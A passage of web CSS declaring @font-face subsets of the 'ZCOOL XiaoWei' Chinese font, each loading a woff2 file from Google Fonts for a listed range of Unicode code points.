U+7db4-7db8, U+7dba-7dbf, U+7dc1, U+7dc4, U+7dc7-7dc8, U+7dca-7dcd, U+7dcf, U+7dd1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.47.woff2) format(\'woff2\');unicode-range: U+7bd3-7bd4, U+7bd9-7bda, U+7bdd, U+7be0-7be1, U+7be4-7be6, U+7be9-7bea, U+7bef, U+7bf4, U+7bf6, U+7bfc, U+7bfe, U+7c01, U+7c03, U+7c07-7c08, U+7c0a-7c0d, U+7c0f, U+7c11, U+7c15-7c16, U+7c19, U+7c1e-7c21, U+7c23-7c24, U+7c26, U+7c28-7c33, U+7c35, U+7c37-7c3b, U+7c3d-7c3e, U+7c40-7c41, U+7c43, U+7c47-7c48, U+7c4c, U+7c50, U+7c53-7c54, U+7c59, U+7c5f-7c60, U+7c63-7c65, U+7c6c, U+7c6e, U+7c72, U+7c74, U+7c79-7c7a, U+7c7c, U+7c81-7c82, U+7c84-7c85, U+7c88, U+7c8a-7c91, U+7c93-7c96, U+7c99, U+7c9b-7c9e, U+7ca0-7ca2, U+7ca6-7ca9, U+7cac, U+7caf-7cb3, U+7cb5-7cb7, U+7cba-7cbd, U+7cbf-7cc2, U+7cc5, U+7cc7-7cc9, U+7ccc-7ccd, U+7cd7, U+7cdc, U+7cde, U+7ce0, U+7ce4-7ce5, U+7ce7;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.48.woff2) format(\'woff2\');unicode-range: U+7ae6, U+7af4-7af7, U+7afa-7afb, U+7afd-7b0a, U+7b0c, U+7b0e-7b0f, U+7b13, U+7b15-7b16, U+7b18-7b19, U+7b1e-7b20, U+7b22-7b25, U+7b29-7b2b, U+7b2d-7b2e, U+7b30-7b3b, U+7b3e-7b3f, U+7b41-7b42, U+7b44-7b47, U+7b4a, U+7b4c-7b50, U+7b58, U+7b5a, U+7b5c, U+7b60, U+7b66-7b67, U+7b69, U+7b6c-7b6f, U+7b72-7b76, U+7b7b-7b7d, U+7b7f, U+7b82, U+7b85, U+7b87, U+7b8b-7b96, U+7b98-7b99, U+7b9b-7b9f, U+7ba2-7ba4, U+7ba6-7bac, U+7bae-7bb0, U+7bb4, U+7bb7-7bb9, U+7bbb, U+7bc0-7bc1, U+7bc3-7bc4, U+7bc6, U+7bc8-7bcc, U+7bd1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.49.woff2) format(\'woff2\');unicode-range: U+798b-798e, U+7992, U+7994-7995, U+7997-7998, U+799a-799c, U+799f, U+79a3-79a6, U+79a8-79ac, U+79ae-79b1, U+79b3-79b5, U+79b8, U+79ba, U+79bf, U+79c2, U+79c6, U+79c8, U+79cf, U+79d5-79d6, U+79dd-79de, U+79e3, U+79e7-79e8, U+79eb, U+79ed, U+79f4, U+79f7-79f8, U+79fa, U+79fe, U+7a02-7a03, U+7a05, U+7a0a, U+7a14, U+7a17, U+7a19, U+7a1c, U+7a1e-7a1f, U+7a23, U+7a25-7a26, U+7a2c, U+7a2e, U+7a30-7a32, U+7a36-7a37, U+7a39, U+7a3c, U+7a40, U+7a42, U+7a47, U+7a49, U+7a4c-7a4f, U+7a51, U+7a55, U+7a5b, U+7a5d-7a5e, U+7a62-7a63, U+7a66, U+7a68-7a69, U+7a6b, U+7a70, U+7a78, U+7a80, U+7a85-7a88, U+7a8a, U+7a90, U+7a93-7a96, U+7a98, U+7a9b-7a9c, U+7a9e, U+7aa0-7aa1, U+7aa3, U+7aa8-7aaa, U+7aac-7ab0, U+7ab3, U+7ab8, U+7aba, U+7abd-7abf, U+7ac4-7ac5, U+7ac7-7ac8, U+7aca, U+7ad1-7ad2, U+7ada-7add, U+7ae1, U+7ae4;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.50.woff2) format(\'woff2\');unicode-range: U+784c, U+784e-7854, U+7856-7857, U+7859-785a, U+7865, U+7869-786a, U+786d, U+786f, U+7876-7877, U+787c, U+787e-787f, U+7881, U+7887-7889, U+7893-7894, U+7898-789e, U+78a1, U+78a3, U+78a5, U+78a9, U+78ad, U+78b2, U+78b4, U+78b6, U+78b9-78ba, U+78bc, U+78bf, U+78c3, U+78c9, U+78cb, U+78d0-78d2, U+78d4, U+78d9-78da, U+78dc, U+78de, U+78e1, U+78e5-78e6, U+78ea, U+78ec, U+78ef, U+78f1-78f2, U+78f4, U+78fa-78fb, U+78fe, U+7901-7902, U+7905, U+7907, U+7909, U+790b-790c, U+790e, U+7910, U+7913, U+7919-791b, U+791e-791f, U+7921, U+7924, U+7926, U+792a-792b, U+7934, U+7936, U+7939, U+793b, U+793d, U+7940, U+7942-7943, U+7945-7947, U+7949-794a, U+794c, U+794e-7951, U+7953-7955, U+7957-795a, U+795c, U+795f-7960, U+7962, U+7964, U+7966-7967, U+7969, U+796b, U+796f, U+7972, U+7974, U+7979, U+797b-797c, U+797e-7980, U+7982, U+7986-7987, U+7989-798a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.51.woff2) format(\'woff2\');unicode-range: U+7722, U+7726, U+7728, U+772b-7730, U+7732-7736, U+7739-773a, U+773d-773f, U+7743, U+7746-7747, U+774c-774f, U+7751-7752, U+7758-775a, U+775c-775e, U+7762, U+7765-7766, U+7768-776a, U+776c-776d, U+7771-7772, U+777a, U+777c-777e, U+7780, U+7785, U+7787, U+778b-778d, U+778f-7791, U+7793, U+779e-77a0, U+77a2, U+77a5, U+77ad, U+77af, U+77b4-77b7, U+77bd-77c0, U+77c2, U+77c5, U+77c7, U+77cd, U+77d6-77d7, U+77d9-77da, U+77dd-77de, U+77e7, U+77ea, U+77ec, U+77ef, U+77f8, U+77fb, U+77fd-77fe, U+7800, U+7803, U+7806, U+7809, U+780f-7812, U+7815, U+7817-7818, U+781a-781f, U+7821-7823, U+7825-7827, U+7829, U+782b-7830, U+7832-7833, U+7835, U+7837, U+7839-783c, U+783e, U+7841-7844, U+7847-7849, U+784b;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.52.woff2) format(\'woff2\');unicode-range: U+7613-7619, U+761b-761d, U+761f-7622, U+7625, U+7627-762a, U+762e-7630, U+7632-7635, U+7638-763a, U+763c-763d, U+763f-7640, U+7642-7643, U+7647-7648, U+764d-764e, U+7652, U+7654, U+7658, U+765a, U+765c, U+765e-765f, U+7661-7663, U+7665, U+7669, U+766c, U+766e-766f, U+7671-7673, U+7675-7676, U+7678-767a, U+767f, U+7681, U+7683, U+7688, U+768a-768c, U+768e, U+7690-7692, U+7695, U+7698, U+769a-769b, U+769d-76a0, U+76a2, U+76a4-76a7, U+76ab-76ac, U+76af-76b0, U+76b2, U+76b4-76b5, U+76ba-76bb, U+76bf, U+76c2-76c3, U+76c5, U+76c9, U+76cc-76ce, U+76dc-76de, U+76e1-76ea, U+76f1, U+76f9-76fb, U+76fd, U+76ff-7700, U+7703-7704, U+7707-7708, U+770c-770f, U+7712, U+7714, U+7716, U+7719-771b, U+771e, U+7721;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.53.woff2) format(\'woff2\');unicode-range: U+750d, U+750f, U+7511, U+7513, U+7515, U+7517, U+7519, U+7521-7527, U+752a, U+752c-752d, U+752f, U+7534, U+7536, U+753a, U+753e, U+7540, U+7544, U+7547-754b, U+754d-754e, U+7550-7553, U+7556-7557, U+755a-755b, U+755d-755e, U+7560, U+7562, U+7564, U+7566-7568, U+756b-756c, U+756f-7573, U+7575, U+7579-757c, U+757e-757f, U+7581-7584, U+7587, U+7589-758e, U+7590, U+7592, U+7594, U+7596, U+7599-759a, U+759d, U+759f-75a0, U+75a3, U+75a5, U+75a8, U+75ac-75ad, U+75b0-75b1, U+75b3-75b5, U+75b8, U+75bd, U+75c1-75c4, U+75c8-75ca, U+75cc-75cd, U+75d4, U+75d6, U+75d9, U+75de, U+75e0, U+75e2-75e4, U+75e6-75ea, U+75f1-75f3, U+75f7, U+75f9-75fa, U+75fc, U+75fe-7601, U+7603, U+7605-7606, U+7608-760e, U+7610-7612;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.54.woff2) format(\'woff2\');unicode-range: U+73f0, U+73f2, U+73f4-73f5, U+73f7, U+73f9-73fa, U+73fc-73fd, U+73ff-7402, U+7404, U+7407-7408, U+740a-740f, U+7418, U+741a-741c, U+741e, U+7424-7425, U+7428-7429, U+742c-7430, U+7432, U+7435-7436, U+7438-743b, U+743e-7441, U+7443-7446, U+7448, U+744a-744b, U+7452, U+7457, U+745b, U+745d, U+7460, U+7462-7465, U+7467-746a, U+746d, U+746f, U+7471, U+7473-7474, U+7477, U+747a, U+747e, U+7481-7482, U+7484, U+7486, U+7488-748b, U+748e-748f, U+7493, U+7498, U+749a, U+749c-74a0, U+74a3, U+74a6, U+74a9-74aa, U+74ae, U+74b0-74b2, U+74b6, U+74b8-74ba, U+74bd, U+74bf, U+74c1, U+74c3, U+74c5, U+74c8, U+74ca, U+74cc, U+74cf, U+74d1-74d2, U+74d4-74d5, U+74d8-74db, U+74de-74e0, U+74e2, U+74e4-74e5, U+74e7-74e9, U+74ee-74ef, U+74f4, U+74ff, U+7501, U+7503, U+7505, U+7508;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.55.woff2) format(\'woff2\');unicode-range: U+72e6, U+72e8, U+72ef-72f0, U+72f2-72f4, U+72f6-72f7, U+72f9-72fb, U+72fd, U+7300-7304, U+7307, U+730a-730c, U+7313-7317, U+731d-7322, U+7327, U+7329, U+732c-732d, U+7330-7331, U+7333, U+7335-7337, U+7339, U+733d-733e, U+7340, U+7342, U+7344-7345, U+734a, U+734d-7350, U+7352, U+7355, U+7357, U+7359, U+735f-7360, U+7362-7363, U+7365, U+7368, U+736c-736d, U+736f-7370, U+7372, U+7374-7376, U+7378, U+737a-737b, U+737d-737e, U+7382-7383, U+7386, U+7388, U+738a, U+738c-7393, U+7395, U+7397-739a, U+739c, U+739e, U+73a0-73a3, U+73a5-73a8, U+73aa, U+73ad, U+73b1, U+73b3, U+73b6-73b7, U+73b9, U+73c2, U+73c5-73c9, U+73cc, U+73ce-73d0, U+73d2, U+73d6, U+73d9, U+73db-73de, U+73e3, U+73e5-73ea, U+73ee-73ef;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.56.woff2) format(\'woff2\');unicode-range: U+71a8, U+71af, U+71b1-71bc, U+71be, U+71c1-71c2, U+71c4, U+71c8-71cb, U+71ce-71d0, U+71d2, U+71d4, U+71d9-71da, U+71dc, U+71df-71e0, U+71e6-71e8, U+71ea, U+71ed-71ee, U+71f4, U+71f6, U+71f9, U+71fb-71fc, U+71ff-7200, U+7207, U+720c-720d, U+7210, U+7216, U+721a-721e, U+7223, U+7228, U+722b, U+722d-722e, U+7230, U+7232, U+723a-723c, U+723e-7242, U+7246, U+724b, U+724d-724e, U+7252, U+7256, U+7258, U+725a, U+725c-725d, U+7260, U+7264-7266, U+726a, U+726c, U+726e-726f, U+7271, U+7273-7274, U+7278, U+727b, U+727d-727e, U+7281-7282, U+7284, U+7287, U+728a, U+728d, U+728f, U+7292, U+729b, U+729f-72a0, U+72a7, U+72ad-72ae, U+72b0-72b5, U+72b7-72b8, U+72ba-72be, U+72c0-72c1, U+72c3, U+72c5-72c6, U+72c8, U+72cc-72ce, U+72d2, U+72d6, U+72db, U+72dd-72df, U+72e1, U+72e5;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.57.woff2) format(\'woff2\');unicode-range: U+700b, U+700d, U+7015, U+7018, U+701b, U+701d-701f, U+7023, U+7026-7028, U+702c, U+702e-7030, U+7035, U+7037, U+7039-703a, U+703c-703e, U+7044, U+7049-704b, U+704f, U+7051, U+7058, U+705a, U+705c-705e, U+7061, U+7064, U+7066, U+706c, U+707d, U+7080-7081, U+7085-7086, U+708a, U+708f, U+7091, U+7094-7095, U+7098-7099, U+709c-709d, U+709f, U+70a4, U+70a9-70aa, U+70af-70b2, U+70b4-70b7, U+70bb, U+70c0, U+70c3, U+70c7, U+70cb, U+70ce-70cf, U+70d4, U+70d9-70da, U+70dc-70dd, U+70e0, U+70e9, U+70ec, U+70f7, U+70fa, U+70fd, U+70ff, U+7104, U+7108-7109, U+710c, U+7110, U+7113-7114, U+7116-7118, U+711c, U+711e, U+7120, U+712e-712f, U+7131, U+713c, U+7142, U+7144-7147, U+7149-714b, U+7150, U+7152, U+7155-7156, U+7159-715a, U+715c, U+7161, U+7165-7166, U+7168-7169, U+716d, U+7173-7174, U+7176, U+7178, U+717a, U+717d, U+717f-7180, U+7184, U+7186-7188, U+7192, U+7198, U+719c, U+71a0, U+71a4-71a5;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.58.woff2) format(\'woff2\');unicode-range: U+6ed9, U+6edb, U+6edd, U+6edf-6ee0, U+6ee2, U+6ee6, U+6eea, U+6eec, U+6eee-6eef, U+6ef2-6ef3, U+6ef7-6efa, U+6efe, U+6f01, U+6f03, U+6f08-6f09, U+6f15-6f16, U+6f19, U+6f22-6f25, U+6f28-6f2a, U+6f2c-6f2d, U+6f2f, U+6f32, U+6f36-6f38, U+6f3f, U+6f43-6f46, U+6f48, U+6f4b, U+6f4e-6f4f, U+6f51, U+6f54-6f57, U+6f59-6f5b, U+6f5e-6f5f, U+6f61, U+6f64-6f67, U+6f69-6f6c, U+6f6f-6f72, U+6f74-6f76, U+6f78-6f7e, U+6f80-6f83, U+6f86, U+6f89, U+6f8b-6f8d, U+6f90, U+6f92, U+6f94, U+6f97-6f98, U+6f9b, U+6fa3-6fa5, U+6fa7, U+6faa, U+6faf, U+6fb1, U+6fb4, U+6fb6, U+6fb9, U+6fc1-6fcb, U+6fd1-6fd3, U+6fd5, U+6fdb, U+6fde-6fe1, U+6fe4, U+6fe9, U+6feb-6fec, U+6fee-6ff1, U+6ffa, U+6ffe, U+7005-7006, U+7009;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.59.woff2) format(\'woff2\');unicode-range: U+6dc3, U+6dc5-6dc6, U+6dc9, U+6dcc, U+6dcf, U+6dd2-6dd3, U+6dd6, U+6dd9-6dde, U+6de0, U+6de4, U+6de6, U+6de8-6dea, U+6dec, U+6def-6df0, U+6df5-6df6, U+6df8, U+6dfa, U+6dfc, U+6e03-6e04, U+6e07-6e09, U+6e0b-6e0c, U+6e0e, U+6e11, U+6e13, U+6e15-6e16, U+6e19-6e1b, U+6e1e-6e1f, U+6e22, U+6e25-6e27, U+6e2b-6e2c, U+6e36-6e37, U+6e39-6e3a, U+6e3c-6e41, U+6e44-6e45, U+6e47, U+6e49-6e4b, U+6e4d-6e4e, U+6e51, U+6e53-6e55, U+6e5c-6e5f, U+6e61-6e63, U+6e65-6e67, U+6e6a-6e6b, U+6e6d-6e70, U+6e72-6e74, U+6e76-6e78, U+6e7c, U+6e80-6e82, U+6e86-6e87, U+6e89, U+6e8d, U+6e8f, U+6e96, U+6e98, U+6e9d-6e9f, U+6ea1, U+6ea5-6ea7, U+6eab, U+6eb1-6eb2, U+6eb4, U+6eb7, U+6ebb-6ebd, U+6ebf-6ec6, U+6ec8-6ec9, U+6ecc, U+6ecf-6ed0, U+6ed3-6ed4, U+6ed7-6ed8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.60.woff2) format(\'woff2\');unicode-range: U+6cb1-6cb2, U+6cb4-6cb5, U+6cb7, U+6cba, U+6cbc-6cbd, U+6cc1-6cc3, U+6cc5-6cc7, U+6cd0-6cd4, U+6cd6-6cd7, U+6cd9-6cda, U+6cde-6ce0, U+6ce4, U+6ce6, U+6ce9, U+6ceb-6cef, U+6cf1-6cf2, U+6cf6-6cf7, U+6cfa, U+6cfe, U+6d03-6d05, U+6d07-6d08, U+6d0a, U+6d0c, U+6d0e-6d11, U+6d13-6d14, U+6d16, U+6d18-6d1a, U+6d1c, U+6d1f, U+6d22-6d23, U+6d26-6d29, U+6d2b, U+6d2e-6d30, U+6d33, U+6d35-6d36, U+6d38-6d3a, U+6d3c, U+6d3f, U+6d42-6d44, U+6d48-6d49, U+6d4d, U+6d50, U+6d52, U+6d54, U+6d56-6d58, U+6d5a-6d5c, U+6d5e, U+6d60-6d61, U+6d63-6d65, U+6d67, U+6d6c-6d6d, U+6d6f, U+6d75, U+6d7b-6d7d, U+6d87, U+6d8a, U+6d8e, U+6d90-6d9a, U+6d9c-6da0, U+6da2-6da3, U+6da7, U+6daa-6dac, U+6dae, U+6db3-6db4, U+6db6, U+6db8, U+6dbc, U+6dbf, U+6dc2;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.61.woff2) format(\'woff2\');unicode-range: U+6b83-6b86, U+6b89, U+6b8d, U+6b91-6b93, U+6b95, U+6b97-6b98, U+6b9a-6b9b, U+6b9e, U+6ba1-6ba4, U+6ba9-6baa, U+6bad, U+6baf-6bb0, U+6bb2-6bb3, U+6bba-6bbd, U+6bc0, U+6bc2, U+6bc6, U+6bca-6bcc, U+6bce, U+6bd0-6bd1, U+6bd3, U+6bd6-6bd8, U+6bda, U+6be1, U+6be6, U+6bec, U+6bf1, U+6bf3-6bf5, U+6bf9, U+6bfd, U+6c05-6c08, U+6c0d, U+6c10, U+6c15-6c1a, U+6c21, U+6c23-6c26, U+6c29-6c2d, U+6c30-6c33, U+6c35-6c37, U+6c39-6c3a, U+6c3c-6c3f, U+6c46, U+6c4a-6c4c, U+6c4e-6c50, U+6c54, U+6c56, U+6c59-6c5c, U+6c5e, U+6c63, U+6c67-6c69, U+6c6b, U+6c6d, U+6c6f, U+6c72-6c74, U+6c78-6c7a, U+6c7c, U+6c84-6c87, U+6c8b-6c8c, U+6c8f, U+6c91, U+6c93-6c96, U+6c98, U+6c9a, U+6c9d, U+6ca2-6ca4, U+6ca8-6ca9, U+6cac-6cae;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.62.woff2) format(\'woff2\');unicode-range: U+69fe-6a01, U+6a06, U+6a09, U+6a0b, U+6a11, U+6a13, U+6a17-6a19, U+6a1b, U+6a1e, U+6a23, U+6a28-6a29, U+6a2b, U+6a2f-6a30, U+6a35, U+6a38-6a40, U+6a46-6a48, U+6a4a-6a4b, U+6a4e, U+6a50, U+6a52, U+6a5b, U+6a5e, U+6a62, U+6a65-6a67, U+6a6b, U+6a79, U+6a7c, U+6a7e-6a7f, U+6a84, U+6a86, U+6a8e, U+6a90-6a91, U+6a94, U+6a97, U+6a9c, U+6a9e, U+6aa0, U+6aa2, U+6aa4, U+6aa9, U+6aab, U+6aae-6ab0, U+6ab2-6ab3, U+6ab5, U+6ab7-6ab8, U+6aba-6abb, U+6abd, U+6abf, U+6ac2-6ac4, U+6ac6, U+6ac8, U+6acc, U+6ace, U+6ad2-6ad3, U+6ad8-6adc, U+6adf-6ae0, U+6ae4-6ae5, U+6ae7-6ae8, U+6afb, U+6b04-6b05, U+6b0d-6b13, U+6b16-6b17, U+6b19, U+6b24-6b25, U+6b2c, U+6b37-6b39, U+6b3b, U+6b3d, U+6b43, U+6b46, U+6b4e, U+6b50, U+6b53-6b54, U+6b58-6b59, U+6b5b, U+6b60, U+6b69, U+6b6d, U+6b6f-6b70, U+6b73-6b74, U+6b77-6b7a, U+6b80-6b82;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.63.woff2) format(\'woff2\');unicode-range: U+68d3, U+68d7, U+68dd, U+68df, U+68e1, U+68e3-68e4, U+68e6-68ed, U+68ef-68f0, U+68f2, U+68f4, U+68f6-68f7, U+68f9, U+68fb-68fd, U+68ff-6902, U+6906-6908, U+690b, U+6910, U+691a-691c, U+691f-6920, U+6924-6925, U+692a, U+692d, U+6934, U+6939, U+693c-6945, U+694a-694b, U+6952-6954, U+6957, U+6959, U+695b, U+695d, U+695f, U+6962-6964, U+6966, U+6968-696c, U+696e-696f, U+6971, U+6973-6974, U+6978-6979, U+697d, U+697f-6980, U+6985, U+6987-698a, U+698d-698e, U+6994-6999, U+699b, U+69a3-69a4, U+69a6-69a7, U+69ab, U+69ad-69ae, U+69b1, U+69b7, U+69bb-69bc, U+69c1, U+69c3-69c5, U+69c7, U+69ca-69ce, U+69d0-69d1, U+69d3-69d4, U+69d7-69da, U+69e0, U+69e4, U+69e6, U+69ec-69ed, U+69f1-69f3, U+69f8, U+69fa-69fc;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.64.woff2) format(\'woff2\');unicode-range: U+678b-678d, U+678f, U+6792-6793, U+6796, U+6798, U+679e-67a1, U+67a5, U+67a7-67a9, U+67ac-67ad, U+67b0-67b1, U+67b3, U+67b5, U+67b7, U+67b9, U+67bb-67bc, U+67c0-67c1, U+67c3, U+67c5-67ca, U+67d1-67d2, U+67d7-67d9, U+67dd-67df, U+67e2-67e4, U+67e6-67e9, U+67f0, U+67f5, U+67f7-67f8, U+67fa-67fb, U+67fd-67fe, U+6800-6801, U+6803-6804, U+6806, U+6809-680a, U+680c, U+680e, U+6812, U+681d-681f, U+6822, U+6824-6829, U+682b-682d, U+6831-6835, U+683b, U+683e, U+6840-6841, U+6844-6845, U+6849, U+684e, U+6853, U+6855-6856, U+685c-685d, U+685f-6862, U+6864, U+6866-6868, U+686b, U+686f, U+6872, U+6874, U+6877, U+687f, U+6883, U+6886, U+688f, U+689b, U+689f-68a0, U+68a2-68a3, U+68b1, U+68b6, U+68b9-68ba, U+68bc-68bf, U+68c1-68c4, U+68c6, U+68c8, U+68ca, U+68cc, U+68d0-68d1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.65.woff2) format(\'woff2\');unicode-range: U+6631, U+6633-6634, U+6636, U+663a-663b, U+663d, U+6641, U+6644-6645, U+6649, U+664c, U+664f, U+6654, U+6659, U+665b, U+665d-665e, U+6660-6667, U+6669, U+666b-666c, U+6671, U+6673, U+6677-6679, U+667c, U+6680-6681, U+6684-6685, U+6688-6689, U+668b-668e, U+6690, U+6692, U+6695, U+6698, U+669a, U+669d, U+669f-66a0, U+66a2-66a3, U+66a6, U+66aa-66ab, U+66b1-66b2, U+66b5, U+66b8-66b9, U+66bb, U+66be, U+66c1, U+66c6-66c9, U+66cc, U+66d5-66d8, U+66da-66dc, U+66de-66e2, U+66e8-66ea, U+66ec, U+66f1, U+66f3, U+66f7, U+66fa, U+66fd, U+6702, U+6705, U+670a, U+670f-6710, U+6713, U+6715, U+6719, U+6722-6723, U+6725-6727, U+6729, U+672d-672e, U+6732-6733, U+6736, U+6739, U+673b, U+673f, U+6744, U+6748, U+674c-674d, U+6753, U+6755, U+6762, U+6767, U+6769-676c, U+676e, U+6772-6773, U+6775, U+6777, U+677a-677d, U+6782-6783, U+6787, U+678a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.66.woff2) format(\'woff2\');unicode-range: U+64f1-64f2, U+64f4, U+64f7-64f8, U+64fa, U+64fc, U+64fe-64ff, U+6503, U+6509, U+650f, U+6514, U+6518, U+651c-651e, U+6522-6525, U+652a-652c, U+652e, U+6530-6532, U+6534-6535, U+6537-6538, U+653a, U+653c-653d, U+6542, U+6549-654b, U+654d-654e, U+6553-6555, U+6557-6558, U+655d, U+6564, U+6569, U+656b, U+656d-656f, U+6571, U+6573, U+6575-6576, U+6578-657e, U+6581-6583, U+6585-6586, U+6589, U+658e-658f, U+6592-6593, U+6595-6596, U+659b, U+659d, U+659f-65a1, U+65a3, U+65ab-65ac, U+65b2, U+65b6-65b7, U+65ba-65bb, U+65be-65c0, U+65c2-65c4, U+65c6-65c8, U+65cc, U+65ce, U+65d0, U+65d2-65d3, U+65d6, U+65db, U+65dd, U+65e1, U+65e3, U+65ee-65f0, U+65f3-65f5, U+65f8, U+65fb-65fc, U+65fe-6600, U+6603, U+6607, U+6609, U+660b, U+6610-6611, U+6619-661a, U+661c-661e, U+6621, U+6624, U+6626, U+662a-662c, U+662e, U+6630;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.67.woff2) format(\'woff2\');unicode-range: U+63b8-63bc, U+63be, U+63c0, U+63c3-63c4, U+63c6, U+63c8, U+63cd-63ce, U+63d1, U+63d6, U+63da-63db, U+63de, U+63e0, U+63e3, U+63e9-63ea, U+63ee, U+63f2, U+63f5-63fa, U+63fc, U+63fe-6400, U+6406, U+640b-640d, U+6410, U+6414, U+6416-6417, U+641b, U+6420-6423, U+6425-6428, U+642a, U+6431-6432, U+6434-6437, U+643d-6442, U+6445, U+6448, U+6450-6452, U+645b-645f, U+6462, U+6465, U+6468, U+646d, U+646f-6471, U+6473, U+6477, U+6479-647d, U+6482-6485, U+6487-6488, U+648c, U+6490, U+6493, U+6496-649a, U+649d, U+64a0, U+64a5, U+64ab-64ac, U+64b1-64b7, U+64b9-64bb, U+64be-64c1, U+64c4, U+64c7, U+64c9-64cb, U+64d0, U+64d4, U+64d7-64d8, U+64da, U+64de, 